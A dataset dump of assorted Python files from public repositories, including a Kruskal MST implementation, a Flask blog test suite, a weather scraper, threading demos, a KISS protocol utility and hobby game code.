if self.bullet_count < self.level:
self.shoot(diff, delta) #needs to be passed because we need the direction
else:
self.shoot(self.vec_player - self.pos, delta) #needs to be passed because we need the direction
global MAX_LEVEL
self.bullet_count = (self.bullet_count + 1) % MAX_LEVEL
self.timer = self.delay
for proj in self.projectiles:
proj.update(delta)
def shoot(self, diff, delta):
#spawns a bullet and adds it to the layer
proj = Projectile(
[self.pos.x, self.pos.y],
self.vec_player.angle(eu.Vector2(1, 0)),
[self.layer],
diff,
self.speed,
self.bullet_len,
self.ammo_type
)
proj.turret = self
self.projectiles.append(proj)
self.layer.add(proj)
| true |
7d6d185d3623e95768681df4926fc1ecc76476a2 | Python | kiram15/cs320 | /Prims/kruskal_mst_reference_implementation.py | UTF-8 | 1,707 | 3.328125 | 3 | [] | no_license | from undirected_graph import Graph
def initialize_disjoint_set(items):
    """Create a disjoint-set forest where every item is its own root (parent None)."""
    return dict.fromkeys(items)
def canonical_item(ds, item):
    """Return the representative (root) of `item`'s set, compressing the path."""
    # Walk parent links until we reach a root (an item with a falsy parent).
    chain = [item]
    while ds[chain[-1]]:
        chain.append(ds[chain[-1]])
    root = chain[-1]
    # Path compression: repoint every visited item directly at the root.
    for visited in chain[:-1]:
        ds[visited] = root
    return root
def same_set(ds, item1, item2):
    """True when item1 and item2 share the same set representative."""
    return canonical_item(ds, item1) == canonical_item(ds, item2)
def merge_sets(ds, item1, item2):
    """Union: attach item1's root beneath item2's root.

    NOTE: callers must ensure the two items are in different sets first
    (as compute_mst does) — merging a set with itself makes the root its
    own parent, which would loop forever in canonical_item.
    """
    root1 = canonical_item(ds, item1)
    root2 = canonical_item(ds, item2)
    ds[root1] = root2
def read_weighted_undirected_graph(filename):
    """Parse `filename` into a Graph; each line is "v1 v2 weight".

    Lines that do not split into exactly three fields, or whose weight is
    not an integer, are silently skipped.
    """
    g = Graph()
    with open(filename) as f:
        for line in f:
            # NOTE(review): the bare except also swallows unrelated errors
            # (even KeyboardInterrupt); consider `except ValueError`.
            try:
                v1, v2, w = line.split()
                g.add_edge(v1, v2, {'weight': int(w)})
            except:
                pass
    return g
def write_tree_edges_to_file(edges, filename):
    """Write one "v1 v2 weight" line per tree edge to `filename`."""
    lines = ["{} {} {}\n".format(v1, v2, w) for v1, v2, w in edges]
    with open(filename, mode='w') as f:
        f.writelines(lines)
def compute_mst(filename):
    """Kruskal's MST: read a weighted graph from `filename` and write the
    tree edges to `filename + '.kruskal.mst'`."""
    g = read_weighted_undirected_graph(filename)
    node_sets = initialize_disjoint_set(g.get_nodes())
    node_count = len(node_sets)
    # Sort edges by ascending weight (weight is first in each tuple).
    edges = [(g.attributes_of(v, u)['weight'], v, u) for u,v in g.get_edges()]
    edges.sort()
    tree_edges = []
    for weight, v, u in edges:
        # Take the edge only when it joins two different components.
        if not same_set(node_sets, v, u):
            tree_edges.append((v, u, weight))
            merge_sets(node_sets, v, u)
        # A spanning tree has exactly node_count - 1 edges; stop early.
        if len(tree_edges) == node_count - 1:
            break
    write_tree_edges_to_file(tree_edges, filename + '.kruskal.mst')
if __name__ == "__main__":
import sys
filename = sys.argv[1]
compute_mst(filename)
| true |
93f6626e6e72b43a195b2373546221693490aeef | Python | me13tz/Linux_folder | /yahooWeather.py | UTF-8 | 731 | 3.609375 | 4 | [] | no_license | #!/home/USERNAME/anaconda3/bin/python3.4
import requests, bs4
###download the weather report from Yahoo
res = requests.get('https://weather.yahoo.com/united-states/washington/seattle-12798961/')
if res.status_code != requests.codes.ok:
print("May want to try downloading again - there was a problem.")
exit()
###create a BeautifulSoup object and search for pertinent elements, assign variables
wSoup = bs4.BeautifulSoup(res.text)
p_tags = wSoup.select('p')
today = str(p_tags[0])
tomorrow = str(p_tags[1])
span = wSoup.select('div span')
x = str(span[8])
print()
###slice and dice for clean output
print("Current temperature: "+x[34:36]+"\n")
print("From Yahoo Weather:\n"+today[16:-4]+"\n")
print(tomorrow[16:-4]+"\n")
| true |
1eb7373553834aebbb3d8e7326f55c09f4da2791 | Python | jlh040/SQLAlchemy-Blogly-app | /tests.py | UTF-8 | 4,048 | 2.75 | 3 | [] | no_license | from unittest import TestCase
from app import app
from models import db, User, Post
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly_test_db'
app.config['SQLALCHEMY_ECHO'] = False
app.config['TESTING'] = True
app.config['DEBUG_TB_HOSTS'] = ['dont-show-debugging-toolbar']
db.drop_all()
db.create_all()
class BloglyRouteTestCase(TestCase):
"""Test some of the routes in the main app file."""
def setUp(self):
"""Clear out the database and add sample users."""
Post.query.delete()
User.query.delete()
user_1 = User(first_name = 'Mark', last_name = "Hammond")
user_2 = User(first_name = 'Sally', last_name = "Witherspoon")
db.session.add(user_1)
db.session.add(user_2)
db.session.commit()
self.user_id_1 = user_1.id
self.user_id_2 = user_2.id
def tearDown(self):
"""Clear out the session."""
db.session.rollback()
def test_show_all_users(self):
"""Test that the users appear on the page."""
with app.test_client() as client:
resp = client.get('/users')
html = resp.get_data(as_text=True)
self.assertIn('Mark Hammond', html)
self.assertIn('Sally Witherspoon', html)
def test_create_user(self):
"""Test that a new user is created."""
new_user = {'first-name': 'Jack', 'last-name': 'Skellington'}
with app.test_client() as client:
resp = client.post('/users/new', data=new_user, follow_redirects=True)
html = resp.get_data(as_text=True)
self.assertIn('Jack Skellington', html)
def test_homepage_redirect(self):
"""Test that the '/' route is actually redirected."""
with app.test_client() as client:
resp = client.get('/')
self.assertEqual(resp.status_code, 302)
def test_delete_user(self):
"""Test that a user can be deleted."""
with app.test_client() as client:
# delete user 1
resp = client.post(f'/users/{self.user_id_1}/delete', follow_redirects=True)
# get user 2 from the database
user_2 = User.query.filter(User.id == self.user_id_2).one()
# make a request for all the users in the database
req_for_all_users = User.query.all()
# check that user 2 is the only one in the database
self.assertEqual(req_for_all_users, [user_2])
def test_post_creation(self):
"""Test that a post is created."""
with app.test_client() as client:
# Make a post
resp_1 = client.post(f'/users/{self.user_id_2}/posts/new', data = {'title': 'My first post',
'content': 'This is the content of my first post'}, follow_redirects = True)
# Get that post
user = User.query.get(self.user_id_2)
post = user.posts[0]
# Go to the page for that post
resp_2 = client.get(f'/posts/{post.id}')
html = resp_2.get_data(as_text = True)
# Check that the expected text is on that post's page
self.assertIn('My first post', html)
self.assertIn('This is the content of my first post', html)
def test_post_deletion(self):
"""Test that a post can be deleted."""
with app.test_client() as client:
# Make a post
resp = client.post(f'/users/{self.user_id_1}/posts/new', data = {'title': 'This is yet another post',
'content': 'Welcome to my beautiful post.'}, follow_redirects = True)
# Get the post id
post_id = Post.query.filter(Post.user_id == self.user_id_1).one().id
# Delete the post
client.post(f'/posts/{post_id}/delete', follow_redirects = True)
# Check that the post is gone
resp_2 = client.get(f'/users/{self.user_id_1}')
html = resp_2.get_data(as_text = True)
self.assertNotIn('This is yet another post', html) | true |
bde78a4c974e13d854f32ef45423cc476e96523a | Python | sswietlik/helloPython | /nr07_Petle/nr07_DebuggowanieSkryptu_LAB.py | UTF-8 | 327 | 3.921875 | 4 | [] | no_license | print('Zad 1')
number = 1
previus_number = 0
while number < 50:
print(number + previus_number)
previus_number = number
number = number + 1
print()
print('Zad 2')
print()
text = ''
number = 10
condition = True
while condition:
text += 'x'
print(text)
if len(text) > number:
condition = False | true |
84eb88b3ad655a6d227b629f6226850ff335721d | Python | sciftcigit/DERS-ORNEKLER-PYTHON-I-2020 | /scope-global.py | UTF-8 | 507 | 3.796875 | 4 | [] | no_license | # en üste tanımladığım değişken global scope alanında
# böyle olduğu için hem def hemde ana kod bloğu kısmından erişebildik.
surum = "Surum 3.5"
def selamla(isim) :
ad = isim
global x # global kelimesi ile de global bir değişken oluşturabilirsiniz.
x = 5555
print(ad + " hoşgeldiniz.")
print("Sürüm :" + surum) # surum değişkenine erişiyoruz
selamla("Ayşe")
print("Yazılım sürümü :" + surum) # surum değişkenine erişiyoruz
print(x)
| true |
f1380e308bf8026151814ed933cd553a168c37f3 | Python | Bannonsmith/Assignment-1 | /grocery_app.py | UTF-8 | 2,761 | 4.3125 | 4 | [] | no_license | user_input = ""
print("Grocery App")
# Ask user for the input
#input_1 = input("Which store would you like to go to?")
#input_2 = input("brief description")
#Create shopping list- with title and description
user_input = ""
store_list = []
total = 0
class Grocery:
    """A single shopping-list line item.

    `total` is supplied by the caller (quantity * price) rather than
    derived here.
    """

    def __init__(self, name, quantity, price, total):
        self.name = name
        self.quantity = quantity
        self.price = price
        self.total = total
class StoreList:
    """A shopping list for one store: a name, a description and its items."""

    def __init__(self, name, description):
        self.name = name
        self.description = description
        # Grocery instances added via the "add grocery item" menu option.
        self.grocery_items = []
def show_menu():
    """Print the main menu options."""
    options = (
        "Press 1 to add new shopping list",
        "Press 2 to delete shopping list",
        "Press 3 to view all shopping list",
        "Press 4 to add to grocery item to shopping list",
        "Print q to quit",
    )
    for option in options:
        print(option)
def add_shopping_list():
name = input("Which store would you like to go to? ")
description = input("brief description ")
store = StoreList(name,description)
store_list.append(store)
show_menu()
def add_grocery_item():
view_shopping_list()
store_list_number = int(input("Enter shopping list number to add the grocery item: "))
store_lists = store_list[store_list_number - 1]
name = input("What item would you like to add ")
quantity = float(input("How many {} would you like ".format(name)))
price = float(input("What is the price? "))
total = quantity * price
grocery = Grocery(name,quantity,price,total)
store_lists.grocery_items.append(grocery)
def view_shopping_list():
    """Print every shopping list with its grocery items and a final bill.

    Bug fixes: the original iterated over `grocery.total` (a float, which
    raised TypeError) and called .format() on the return value of print()
    (which is None).  The final bill is now the sum of the item totals.
    """
    for index in range(0, len(store_list)):
        store = store_list[index]
        print(f"{index + 1} - {store.name} - {store.description}")
        bill = 0
        for grocery in store.grocery_items:
            print(f"item - {grocery.name} quantity-{grocery.quantity} each worth ${grocery.price}")
            print(f"Your total cost for those item/items: {grocery.total}")
            bill += grocery.total
        if store.grocery_items:
            print("Your final bill: {}".format(bill))
#grocery = Grocery(name, quantity, price)
show_menu()
try:
while user_input != "q":
user_input = input("Enter your choice: ")
if user_input == "1":
add_shopping_list()
elif user_input == "2":
delete_shopping_list()
elif user_input == "3":
view_shopping_list()
elif user_input == "4":
add_grocery_item()
except ValueError:
print("Please input from the selection above")
# The user shoule be able to add multiple shopping list
# Give user option to display that list
# User can add a grocery item to list- with title
# use format in schoology to print it out
| true |
006db5553b86bd5eb5d41dadd9cedad3f36f4722 | Python | chengrenjiecrj/PythonLianxi | /copyPro/FreeMemory.py | UTF-8 | 783 | 3.25 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding:utf8 -*-
# @Time : 2017/11/30 14:25
# @Author : hantong
# @File : count_free_memory.py
#统计linux系统空闲内存和所有内存
# Report free and total system memory by parsing /proc/meminfo.
with open('/proc/meminfo') as meminfo:
    for entry in meminfo:
        # Lines look like "MemTotal:  16309528 kB"; field [1] is the kB value.
        if entry.startswith('MemTotal'):
            total_kb = entry.split()[1]
            continue
        if entry.startswith('MemFree'):
            free_kb = entry.split()[1]
            break
# NOTE(review): 1024000 is neither 1000**2 nor 1024**2, so these "GB" figures
# are approximate — confirm the intended unit conversion.
TotalMem = int(total_kb) / 1024000.0
FreeMem = int(free_kb) / 1024000.0
# %.2f keeps two decimal places.
print('Free Memory = ' + "%.2f" % FreeMem + 'G')
print('Total Memory = ' + "%.2f" % TotalMem + 'G')
cb6eca75ad2524685edcf359898cfb7401a26c45 | Python | Mabynar/DandyBot | /game/Players/Player.py | UTF-8 | 1,700 | 3.171875 | 3 | [
"MIT"
] | permissive | from Constants import *
class Player:
    """A player-controlled actor on the game board.

    Tracks position, collected gold and keys, and translates command
    constants into board updates on the owning ``game`` object.
    (PASS/TAKE/UP/... and ``random`` come from the ``Constants`` star import.)
    """

    def __init__(self, game, name, tile):
        self.game = game
        self.name = name
        self.tile = tile
        self.x, self.y = 0, 0
        self.gold = 0
        self.keys = 0

    def act(self, cmd):
        """Execute one command constant (PASS, TAKE, or a direction)."""
        if cmd == PASS:
            return
        dx, dy = 0, 0
        if cmd == TAKE:
            self.take()
        elif cmd == UP:
            dy -= 1
        elif cmd == DOWN:
            dy += 1
        elif cmd == LEFT:
            dx -= 1
        elif cmd == RIGHT:
            dx += 1
        self.move(dx, dy)

    def move(self, dx, dy):
        """Try to step by (dx, dy); walls, other players and locked doors block."""
        if dx or dy:
            x, y = self.x + dx, self.y + dy
            game = self.game
            game.remove_player(self)
            # Idiom fix: `or` instead of bitwise `|` (identical truthiness here).
            # A door only blocks movement when the player holds no keys.
            if not game.check(WALL, x, y) and not game.check(PLAYER, x, y) and (not game.check(DOOR, x, y) or self.keys):
                self.x, self.y = x, y
            game.add_player(self, self.x, self.y)

    def take(self):
        """Pick up whatever is on the current tile (gold, key, or portal jump)."""
        gold = self.game.check(GOLD, self.x, self.y)
        if gold:
            self.gold += gold
            self.game.take_item(self.x, self.y)
        key = self.game.check(KEY, self.x, self.y)
        if key:
            self.keys += 1
            self.game.take_item(self.x, self.y)
        portal = self.game.check(PORTAL, self.x, self.y)
        if portal:
            # Collect every *other* portal tile and jump to a random one.
            portals = []
            for i in range(self.game.cols):
                for j in range(self.game.rows):
                    # BUG FIX: the original condition `i == self.x & j == self.y`
                    # parsed as the chained comparison `i == (self.x & j) == self.y`
                    # (bitwise `&` binds tighter than `==`), which is almost always
                    # False, so the current portal was never excluded. Portal
                    # tuples are built as (j, i) -> (x, y), hence the current tile
                    # is j == self.x and i == self.y.
                    if self.game.map[i][j] == '?' and not (j == self.x and i == self.y):
                        portals.append((j, i))
            self.x, self.y = random.choice(portals)

    def newlevel(self):
        """Reset per-level pickups when a new level starts."""
        self.gold = 0
        self.keys = 0
95354f8c9583d4a4e6ad93cf80ccea3ab00f15f1 | Python | RajjatKumare1606/Angle-detect | /AngleFinder.py | UTF-8 | 1,036 | 2.8125 | 3 | [
"Unlicense"
] | permissive | import cv2
import math
path = 'text1.jpg'
img = cv2.imread(path)
pointsList = []
def mousePoint(event,x,y,flags,params):
if event == cv2.EVENT_LBUTTONDOWN:
size = len(pointsList)
if size != 0 and size % 3 != 0:
cv2.line(img,tuple(pointsList[round((size-1)/3)*3]),(x,y),(0,0,255),2)
cv2.circle(img,(x,y),5,(0,0,255),cv2.FILLED)
pointsList.append([x,y])
def gradient(pt1,pt2):
return(pt2[1]-pt1[1])/(pt2[0]-pt1[0])
def getAngle(pointsList):
pt1, pt2, pt3 = pointsList[-3:]
m1 = gradient(pt1,pt2)
m2 = gradient(pt1,pt3)
angR = math.atan((m2-m1)/(1+(m2*m1)))q
angD = round(math.degrees(angR))
cv2.putText(img,str(angD),(pt1[0]-40,pt1[1]-20),cv2.FONT_HERSHEY_COMPLEX, 1.5,(0,0,255),2)
while True:
if len(pointsList) % 3 == 0 and len(pointsList) !=0:
getAngle(pointsList)
cv2.imshow('Image',img)
cv2.setMouseCallback('Image',mousePoint)
if cv2.waitKey(1) & 0xFF == ord('q'):
pointsList = []
img = cv2.imread(path)
| true |
dcbecc74e41811a8e3bee3bf9afeb3e90b25ae6c | Python | Zen-Master-SoSo/legame | /callout.py | UTF-8 | 1,120 | 3.3125 | 3 | [] | no_license | """ Provides the Callout class, a Sprite used during development to provide debug
information positioned near another animated sprite. """
from pygame import Rect, Surface
from pygame.sprite import Sprite
class Callout(Sprite):
def __init__(self, sprite, group, font):
Sprite.__init__(self, group)
self.sprite = sprite
self.rect = Rect((sprite.rect.right, sprite.rect.bottom, 0, 0))
self.image = Surface((0, 0))
self.font = font
self.empty()
def empty(self):
self.texts = []
self.rect.width = 0
def write(self, text, color=(255, 255, 255)):
self.texts.append(self.font.render(text, True, color))
width, height = self.font.size(text)
if width > self.rect.width:
self.rect.width = width
self.rect.height += height
def update(self):
self.rect.left = self.sprite.rect.right
self.rect.top = self.sprite.rect.bottom
self.image = Surface((self.rect.width, self.rect.height))
self.image.set_colorkey((0,0,0))
self.image.fill((0,0,0))
line_height = self.font.get_linesize()
y = 0
for s in self.texts:
self.image.blit(s, (0, y))
y += line_height
self.rect.height = y
| true |
dff89387cc8dd54a3cfc547c8e4bd4f7eab3841c | Python | Kooki-eByte/Teaching-Python | /09_Walrus_Expression/example.py | UTF-8 | 411 | 3.21875 | 3 | [
"MIT"
] | permissive | # The Walrus operator :=
# Fake incoming request payload used to exercise process_form() below.
request = {
    "form": {
        "username": "Cristian",
        "password": "iLovePython"
    }
}
# Stand-in "database": passwords accepted so far.
db = []
def process_form(req):
    """Validate the submitted password and store it when long enough."""
    # The walrus operator binds `pw` inside the condition expression itself.
    if len(pw := req["form"].get("password")) <= 5:
        return "Password is too short!"
    db.append(pw)
    return "User Added!"
# Demo: the sample password ("iLovePython", 11 chars) passes validation.
print(process_form(request))
print(db)
| true |
c28e767b778e0d3822c0cf48a15c3a69ab88a418 | Python | WeiFeiLong/exam | /58_1.py | UTF-8 | 385 | 3.015625 | 3 | [] | no_license | def gettwo(s):
a = {}
b = []
for x in range(len(s)):
if a.__contains__(s[x:x + 2]):
a[s[x:x + 2]] += 1
else:
a[s[x:x + 2]] = 1
a = sorted(a.items(), key=lambda x: x[1])[::-1]
for x in range(len(a)):
if a[x][1] == a[0][1]:
b.append(a[x][0])
return b
s = 'qewqewrdsafdsfdsgrfgdgfdcx'
print(gettwo(s)) | true |
118856e83db829a6b05620cd23e13b85b24e7b8f | Python | u1273400/iscjava | /xpy/trihp.py | UTF-8 | 194 | 3.265625 | 3 | [] | no_license | from math import sqrt
def trihp(a, b, c, f, g):
    """Combined area of two triangles that share base c.

    Triangle 1 has sides (a, b, c); triangle 2 has sides (f, g, c). For each,
    the foot of the altitude onto c follows from the law of cosines, giving
    the triangle's height and hence its area.
    """
    foot1 = (c**2 + a**2 - b**2) / (2 * c)
    foot2 = (c**2 + f**2 - g**2) / (2 * c)
    height1 = sqrt(a**2 - foot1**2)
    height2 = sqrt(f**2 - foot2**2)
    return 0.5 * c * (height1 + height2)
# Demo: area of the quadrilateral split along the shared diagonal of 5.15.
area = trihp(3.2, 2.6, 5.15, 4.0, 5.5)
print(area)
4112e3a80e7f2e71cdeaab7f658d8a37fe807c7d | Python | xssfox/kiss-fix | /kiss/util.py | UTF-8 | 2,731 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python KISS Module Utility Functions Definitions."""
from . import constants
__author__ = 'Greg Albrecht W2GMD <oss@undef.net>' # NOQA pylint: disable=R0801
__copyright__ = 'Copyright 2017 Greg Albrecht and Contributors' # NOQA pylint: disable=R0801
__license__ = 'Apache License, Version 2.0' # NOQA pylint: disable=R0801
def escape_special_codes(raw_codes):
    """
    Escape special codes, per KISS spec.

    "If the FEND or FESC codes appear in the data to be transferred, they
    need to be escaped. The FEND code is then sent as FESC, TFEND and the
    FESC is then sent as FESC, TFESC."
    - http://en.wikipedia.org/wiki/KISS_(TNC)#Description
    """
    output = b''
    # Idiom fix: the original enumerated the bytes but never used the index.
    for code in raw_codes:
        byte = bytes([code])
        if byte == constants.FESC:
            output += constants.FESC_TFESC
        elif byte == constants.FEND:
            output += constants.FESC_TFEND
        else:
            output += byte
    return output
def recover_special_codes(escaped_codes):
    """
    Recover special codes, per KISS spec.

    "If the FESC_TFESC or FESC_TFEND escaped codes appear in the data received,
    they need to be recovered to the original codes. The FESC_TFESC code is
    replaced by FESC code and FESC_TFEND is replaced by FEND code."
    - http://en.wikipedia.org/wiki/KISS_(TNC)#Description
    """
    decoded = b''
    pos = 0
    while pos < len(escaped_codes):
        # Examine a two-byte window; escape sequences consume both bytes.
        window = escaped_codes[pos:pos + 2]
        if window == constants.FESC_TFESC:
            decoded += constants.FESC
            pos += 2
        elif window == constants.FESC_TFEND:
            decoded += constants.FEND
            pos += 2
        else:
            decoded += bytes([escaped_codes[pos]])
            pos += 1
    return decoded
def extract_ui(frame):
    """
    Extracts the UI component of an individual frame.

    :param frame: APRS/AX.25 frame.
    :type frame: str
    :returns: UI component of frame.
    :rtype: str
    """
    # Keep the portion of the frame before the FEND + DATA_FRAME marker...
    start_ui = frame.split(
        b''.join([constants.FEND, constants.DATA_FRAME]))
    # ...then the portion before SLOT_TIME + UI protocol id.
    # NOTE(review): splitting on SLOT_TIME here looks unusual for KISS framing —
    # confirm the intended delimiter against the KISS/AX.25 spec.
    end_ui = start_ui[0].split(b''.join([constants.SLOT_TIME, constants.UI_PROTOCOL_ID]))
    # AX.25 address bytes are left-shifted by one bit; shift right to recover ASCII.
    return ''.join([chr(x >> 1) for x in end_ui[0]])
def strip_df_start(frame):
    """
    Strips KISS DATA_FRAME start (0x00) and newline from frame.

    :param frame: APRS/AX.25 frame.
    :type frame: str
    :returns: APRS/AX.25 frame sans DATA_FRAME start (0x00).
    :rtype: str
    """
    # NOTE: lstrip() treats its argument as a *set* of leading bytes to remove,
    # which is fine for the single-byte DATA_FRAME marker.
    return frame.lstrip(constants.DATA_FRAME).strip()
def strip_nmea(frame):
    """
    Extracts NMEA header from T3-Micro or NMEA encoded KISS frames.
    """
    # 0xF0 (240) marks the NMEA header byte; drop it and trailing whitespace.
    if frame and frame[0] == 240:
        return frame[1:].rstrip()
    return frame
| true |
19eb5eb412afbf3d5ade665fb570cdde7f49e089 | Python | hiSh1n/learning_Python3 | /py_project02.py | UTF-8 | 172 | 4.28125 | 4 | [] | no_license | #To convert temperature Celsius to Fahrenheit using formula.
# Read a Celsius temperature (integer) and print the Fahrenheit equivalent.
tempc = int(input("enter temperature in celsius: "))
# tempc * 1.8 + 32 is already a float, so the original float() wrapper was redundant.
tempf = tempc * 1.8 + 32
# BUG FIX: the output previously misspelled the unit as "farenheit".
print(tempf, "Fahrenheit")
| true |
8c8cd7cdbf451df6531e6cf7d5c575d5fb019d56 | Python | mcewenar/PYTHON_INFO_I_BASIC | /lectura_archivos/read.py | UTF-8 | 575 | 3.25 | 3 | [] | no_license | archivo = open('C:\\Users\\dmcew\\proy_programacion\\Info_I\\lectura_archivos\\prueba.txt','r')
contenido1= archivo.readlines() #Lee todas las líneas y las pasa alista
#contenido1=archivo.read()
contenido2=archivo.read()
for linea in archivo:
print (linea)
print (contenido1)
print ('Re-leyendo')
print (contenido2) #Como ya leyó todo el archivo, sale en espacio en blanco
print ('Fin de programa')
archivo.close()
#lengu = ('C:\\Users\\dmcew\\proy_programacion\\Info_I\\lectura_archivos\\prueba.txt','r')
#cadena = lengu.read()
#print(len(cadena))
#archivo.close() | true |
def countdown(n):
    """Print n, n-1, ..., 1 (one value per line); do nothing for n < 1."""
    if n < 1:
        return
    for value in range(n, 0, -1):
        print(value)
# Execution: print a countdown from 10 to 1.
countdown(10)
| true |
cdba4884b45b44f6873f3c2c49f6291ba41dc35d | Python | wduan2/learning | /python/basic/bst.py | UTF-8 | 3,490 | 3.390625 | 3 | [] | no_license | class Bst:
class Node:
def __init__(self, value=None, left=None, right=None):
self.value = value
self.left = left
self.right = right
def __init__(self):
self.root = Bst.Node()
def add(self, value):
self.__add(self.root, value)
def add_all(self, values):
for v in values:
self.add(v)
def __add(self, node, value):
if not node.value:
node.value = value
return
if value < node.value:
if not node.left:
node.left = Bst.Node(value)
return
child = node.left
else:
if not node.right:
node.right = Bst.Node(value)
return
child = node.right
self.__add(child, value)
def most_unique(self, node, parent, count, min_count, result):
"""
Note:
- set initial value of min_count
- set initial count of root
- not break the reference of result list
- return count and min_count to upper recursion
"""
if not node:
return [count, min_count]
count, min_count = self.most_unique(node.left, parent, count, min_count, result)
if not parent or parent.value == node.value:
count += 1
if (not node.right) or (node.value != node.right.value):
if count < min_count or min_count == 0:
min_count = count
# not break the ref
result.clear()
result.append(node)
elif count == min_count:
result.append(node)
count = 1
parent = node
return self.most_unique(node.right, parent, count, min_count, result)
def in_order(self, node, all_path):
if not node:
return
self.in_order(node.left, all_path)
all_path.append(node)
self.in_order(node.right, all_path)
def pre_order(self):
pass
def post_order(self):
pass
def smallest(self, node, order, q):
if not node or len(q) == order:
return
self.smallest(node.left, order, q)
# save to a queue to resolve the situation where the elements include duplication
if len(q) == 0 or (len(q) < order and q[-1].value != node.value):
q.append(node)
self.smallest(node.right, order, q)
def run(self):
data1 = [9, 5, 13, 1, 8, 7, 10, 21, 18, 20]
data2 = [1, 1, 1, 1, 1, 1]
data3 = [1]
data4 = [1, 1, 2, 2]
data5 = [1, 2, 3, 4, 5, 6, 7]
data6 = [1, 1, 2, 2, 3, 4, 4, 4, 5, 5, 6, 6, 7, 7]
data7 = [9, 5, 13, 1, 8, 7, 10, 21, 18, 20, 9]
for data in [data1, data2, data3, data4, data5, data6, data7]:
self.root = Bst.Node()
self.add_all(data)
most_unique = []
self.most_unique(self.root, None, 0, 0, most_unique)
print(f"most_unique, input: {data}, output: {', '.join([str(p.value) for p in most_unique])}")
q = []
order = 2
in_order = []
self.smallest(self.root, order, q)
self.in_order(self.root, in_order)
ss = 'N/A'
if len(q) == order:
ss = q[order - 1].value
print(f"second_smallest, in order: [{', '.join([str(p.value) for p in in_order])}], result: {ss}\n")
| true |
72647acea29fb767c94553ca566d13b3962365d7 | Python | kagxin/recipe | /concurrent_futures/threading_counter.py | GB18030 | 2,946 | 3.28125 | 3 | [] | no_license | # coding=gbk
import threading, time
from threading import RLock, Lock, Condition, Event
count = 0  # shared counter mutated by the worker threads below
def print_hello(*args, **kwargs):
    # Timer callback: just echoes whatever arguments it was given.
    print(args, kwargs)
class TimerCircle(threading.Timer):
    """Repeating variant of threading.Timer: fires every `interval` seconds.

    BUG FIX: the original looped forever and invoked the callback even after
    cancel() (the is_set() guard was commented out), so the timer could never
    be stopped. Event.wait() returns True once cancel() sets the `finished`
    event, which both paces the loop and makes cancel() effective.
    """
    def run(self):
        # wait() blocks for `interval` seconds and returns False on timeout,
        # or returns True immediately once cancel() has set the event.
        while not self.finished.wait(self.interval):
            self.function(*self.args, **self.kwargs)
# Fire the repeating timer once per second.
# NOTE(review): the third Timer argument is *args*; passing the string 'hello'
# unpacks it into five one-character arguments — confirm that is intended.
t = TimerCircle(1, print_hello, 'hello')
t.start()
# t = threading.Timer(1, print_hello, 'hello')
# t.start()
class Counter(threading.Thread):
    """Worker thread that adds 10000 to the module-global `count` under a lock."""
    def __init__(self, lock, threadName):
        super(Counter, self).__init__(name=threadName)
        self.lock = lock
    def run(self):
        global count
        # Hold the lock for the whole batch so increments are never interleaved.
        with self.lock:
            for _ in range(10000):
                count += 1
lock = threading.Lock()
# Launch five workers; each adds 10000 to `count` under the shared lock.
for i in range(5):
    Counter(lock, "thread-" + str(i)).start()
# NOTE(review): printed without join()ing the workers first, so this usually
# shows a partial total rather than 50000.
print(count)
time.sleep(10)
lock1 = threading.Lock()  # guards the second batch of counter threads
def conter(*args):
    """Thread target: echo its args, then add 10000 to `count` under lock1."""
    print(args)
    global count, lock1
    with lock1:
        for _ in range(10000):
            count += 1
# Start five function-based workers (equivalent to the Counter class above).
for i in range(5):
    t = threading.Thread(target=conter, name="thread-"+str(i), args=(1, 2))
    t.start()
"""
threading : е4
t = threading.Lock()
t.acquire(blocking=True, timeout=-1) ȡtͷǰһֱ
t.release() ͷt
t = threading.RLock()
t.acquire(blocking=True, timeout=-1) ȡڵǰ߳Ѿ
t.release() ͷ
ͬһ߳Уacquirereleaseͬacquirereleaseǰ߳һȡ߳ȡ
threading.Event
t = threading.Condition()
t.acquire(*args) ȡײ
t.release() ͷŵײ
t.wait(timeout=None)
ȴֱ֪ͨʱ߳ڵô˷ʱδȡRuntimeError÷ͷŵײȻֱһ߳е
ͬnotifynotify_allûѣֱѡijʱһѻʱ»ȡء
t.wait_for()
t.notify(n=1)
Ĭ£һ̵߳ȴеĻ ߳ڵô˷ʱδȡRuntimeError
÷ѵȴ߳n; û߳ڵȴЧġ
n߳ڵȴǰʵֽûn̡߳ ǣΪDzȫġ δŻʵֿżỽѳn̡߳
ע⣺һѵ߳ʵϲwait÷أֱ»ȡ notifyͷӦá
t.notify_all()
"""
| true |
87090156619b2dc102bc6ae7a7da225d3b4d87fc | Python | Edo-Hachi/PyxelTinyMevious | /ProjectFile/mevious.py | UTF-8 | 9,504 | 3 | 3 | [
"MIT"
] | permissive | import pyxel
import define
import enemy
#------------------------------------------------------------------------------
# Global state
bullet_list = []  # live player bullets ("zappers")
enemy_list = []   # live enemies
_VSYNC = 0        # NOTE(review): appears unused in this module — confirm before removing
#------------------------------------------------------------------------------
# #線形リストオブジェクトへのupdate一括処理
def update_list(list):
    """Call update() on every object in the list."""
    for entry in list:
        entry.update()
#------------------------------------------------------------------------------
#線形リストオブジェクトへのdraw一括処理
def draw_list(list, vsync):
    """Call draw(vsync) on every object in the list."""
    for entry in list:
        entry.draw(vsync)
#------------------------------------------------------------------------------
#線形リストオブジェクトメンバ破棄
def flash_list(list):
    """Remove every object whose .alive is falsy, mutating the list in place."""
    survivors = [entry for entry in list if entry.alive]
    list[:] = survivors
#------------------------------------------------------------------------------
#自弾管理クラス
class Bullet:
    """Player bullet ("zapper"); registers itself in bullet_list on creation."""
    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.w = define.BULLET_WIDTH
        self.h = define.BULLET_HEIGHT
        self.alive = True
        bullet_list.append(self)
    def update(self):
        # Move upward; kill the bullet once it is fully above the top edge.
        self.y -= define.BULLET_SPEED
        if self.y + self.h - 1 < 0:
            self.alive = False
        bx = self.x
        by = self.y
        # Collision: test the bullet's top-left point against each enemy's box.
        # NOTE(review): only that single point is tested, not the bullet's
        # whole rectangle — confirm this is intended.
        for i in range(len(enemy_list)):
            if enemy_list[i].alive == True:
                ex = enemy_list[i].ex
                ey = enemy_list[i].ey
                if ey <= by and by <= (ey + enemy_list[i].eh):
                    if ex <= bx and bx <= (ex + enemy_list[i].ew):
                        enemy_list[i].alive = False
                        self.alive = False
    def draw(self, vsync):
        #print(str(vsync))
